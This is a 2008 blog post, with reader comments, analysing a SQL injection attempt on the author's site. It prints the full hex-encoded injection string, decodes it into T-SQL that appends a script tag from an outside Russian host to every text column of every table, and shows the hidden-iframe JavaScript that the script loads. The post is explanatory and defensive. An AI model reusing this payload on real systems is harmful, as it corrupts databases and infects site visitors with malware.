A fairly persistent series of hack attempts
Published Wed, Jul 23 2008 9:14 AM
Technorati Tags: Computers and Internet, Blogging, Annoyances
Somebody is trying to hack my site. So far they've been unsuccessful, but they are persistent. How do I know this? Well every time something goes wrong with the site code, (as opposed to something going wrong with my hosting environment) I get an email giving me the details of the failure. That's how I know that someone is trying a SQL Injection attack, and that so far they haven't succeeded. They are persistent though, trying exactly the same routine over and over again.
So, “what is a SQL Injection attack?” This is when the hacker attempts, by modifying the parameters to a query string or form post, to make your site run some extra SQL code along with the normal request. A classic example of such an attack attempts to gain access to secure areas of a website by modifying the parameters to a user lookup routine. This is normally done by taking advantage of the tendency of some developers to use “dynamic SQL” statements that accept unfiltered user input and insert it directly into the statement to be executed.
In any case, the attack being perpetrated here is going after my RSS feeds. They've tried fifteen times using fifteen different IP addresses in the last five hours. Here's the query string they're trying to use…
blogid=1;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(
0x4445434C415245204054205641524348415228323535292C404320
564152434841522832353529204445434C415245205461626C655F43
7572736F7220435552534F5220464F522053454C45435420612E6E61
6D652C622E6E616D652046524F4D207379736F626A6563747320612C
737973636F6C756D6E73206220574845524520612E69643D622E6964
20414E4420612E78747970653D27752720414E442028622E78747970
653D3939204F5220622E78747970653D3335204F5220622E78747970
653D323331204F5220622E78747970653D31363729204F50454E2054
61626C655F437572736F72204645544348204E4558542046524F4D20
5461626C655F437572736F7220494E544F2040542C4043205748494C
4528404046455443485F5354415455533D302920424547494E204558
45432827555044415445205B272B40542B275D20534554205B272B40
432B275D3D525452494D28434F4E5645525428564152434841522834
303030292C5B272B40432B275D29292B27273C736372697074207372
633D687474703A2F2F7777772E34636E772E72752F6E67672E6A733E
3C2F7363726970743E27272729204645544348204E4558542046524F
4D205461626C655F437572736F7220494E544F2040542C404320454E
4420434C4F5345205461626C655F437572736F72204445414C4C4F43
415445205461626C655F437572736F7220%20AS%20VARCHAR(4000))
;EXEC(@S);--
I've inserted a few line-breaks into that long string so that it doesn't break my blog formatting here. I haven't seen this particular approach before but if I were using dynamic SQL statements and accepting unfiltered user input to build them before executing them it would play havoc with my site. Without all of those hexadecimal numbers, here's a simplified version…
blogid=1;DECLARE @S VARCHAR(4000); SET @S=CAST(alongbinarynumber AS VARCHAR(4000));EXEC(@S);--
If it's still not clear enough, here's what they're trying to do. The injected code declares a variable name @S as a large character string, sets its value by casting a binary number into string format and then executes the resulting character string as if it were a SQL statement. The semi-colons are used to separate the individual SQL statements, and to get the SQL code past my site's code. The long binary number is used to hide the actual code that the hacker is trying to execute. I've decoded that for you here…
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name
FROM sysobjects a,syscolumns b
WHERE a.id=b.id
AND a.xtype='u'
AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.4cnw.ru/ngg.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END CLOSE Table_Cursor
DEALLOCATE Table_Cursor
So what the hacker is trying to do here is to update every single character or text column in every table in my database by tacking the string “<script src=http://www.4cnw.ru/ngg.js></script>” onto the end of every value. Not only is this person trying to hack my database, they're also trying to hack my pages, to force them to execute a script from a Russian web site every time you load one of the pages.
Here's the script they're trying to make my site force your browser to execute…
window.status="";
n=navigator.userLanguage.toUpperCase();
if((n!="ZH-CN")&&(n!="UR")&&(n!="RU")&&(n!="KO")&&(n!="ZH-TW")&&(n!="ZH")&&(n!="HI")&&(n!="TH")&&(n!="UR")&&(n!="VI")){
var cookieString = document.cookie;
var start = cookieString.indexOf("vrcgoo=");
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+9*3600*1000);
document.cookie = "vrcgoo=update;expires="+expires.toGMTString();
try{
document.write("<iframe src=http://cvsr.ru/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
}
catch(e) {
};
}}
So they're trying to use the script engine in your browser to store a tracking cookie on your machine and insert an IFRAME into the HTML your browser shows. The source document for that IFRAME comes from “http://cvsr.ru/cgi-bin/index.cgi?ad”. I don't think it's necessary to dig into this much further. It's almost a sure bet that downloading that document in your browser will probably infect your computer with some sort of virus, and that you'd never see it coming unless you have antivirus software that pops up an alert immediately. Since the IFRAME is set to have zero width, zero height, and no border, you wouldn't see the IFRAME or the document. You'd only see the effects, and they're sure to be nasty.
My fellow bloggers, if my site is under this sort of attack, you can bet that yours is too. Protect your site visitors! Make sure you're running the latest version of your blogging platform.
Trackposted to third world county, Allie is Wired, Woman Honor Thyself, DragonLady's World, The World According to Carl, The Pink Flamingo, Leaning Straight Up, Cao's Blog, Democrat=Socialist, Dumb Ox Daily News, Conservative Cat, and Right Voices, thanks to Linkfest Haven Deluxe.
Trackback URI for this post: http://perrinelson.com/track.aspx?postid=1209
Permalink URI for this post: http://perrinelson.com/2008/7/23/1209.aspx
Subscribe to this entry's
comment feed. (Atom)
David responded with:
 | Want me to invoke that URL in a sanboxed or VM-ed browser to see what it is? Perhaps a VM with a sandboxed browser, eh?
;-) |
Layla responded with:
 | My goodness I did not see this post yesterday. Sorry. It was exactly this sort of hacking that took out my original blog Freedom Watch. I am not sure you remember me from that blog, but I remembered you....lol!
That looks scary and I did have a hack attempt two months ago on my old host, but I moved after that because my new host has better protections and gave me a lot of good advice that saved my blog.
I still freak at this stuff though after losing Freedom Watch like that. Thanks to Bernie, my dear friend from Planck's Constant:
http://plancksconstant.org
He found my website on WayBack Machine. I had never heard of the site until Bernie told me about it. I retrieved some old postings from there. Also, Brian Bonner from CAII has all my contributions that I wrote on illegal immigration so it turned out not to be a complete loss. But if it was not for Bernie I would still be crying over Freedom Watch.
I was so attached to that blog it took me four months and the dems winning back both houses to get my arse back in gear again!
Take care of your blog my friend. I am not sure what to say, but maybe you should take David up on his offer. |
Perri Nelson responded with:
 | I already took him up on it, then I analyzed the web page that the IFRAME offered. It did indeed turn out to try to install malware on the box, by exploiting a buffer overrun in Internet Explorer. I've been watching for security flaws in my code for a long time. When I worked for Microsoft, there was an occasion when we actually took a month out of our development schedule to learn about security issues, and to do a comprehensive code review of the product we were building with an eye toward security. It was very instructive, and I learned how to defeat SQL injection attacks back then. I'm not 100% confident that my site is immune from attack, but I doubt that a SQL injection attack will bring it down. I'm always on the lookout for this sort of thing though, because I write software for a living. This incident has prompted me to do a thorough review of my site code to look for other potential risks and do what I can to mitigate them. I'm glad you were able to recover your posts! Bernie's site is a good one. I used to visit it a lot. Thanks for the reminder, I think I'll pay him a visit. |
Comments to this entry are closed.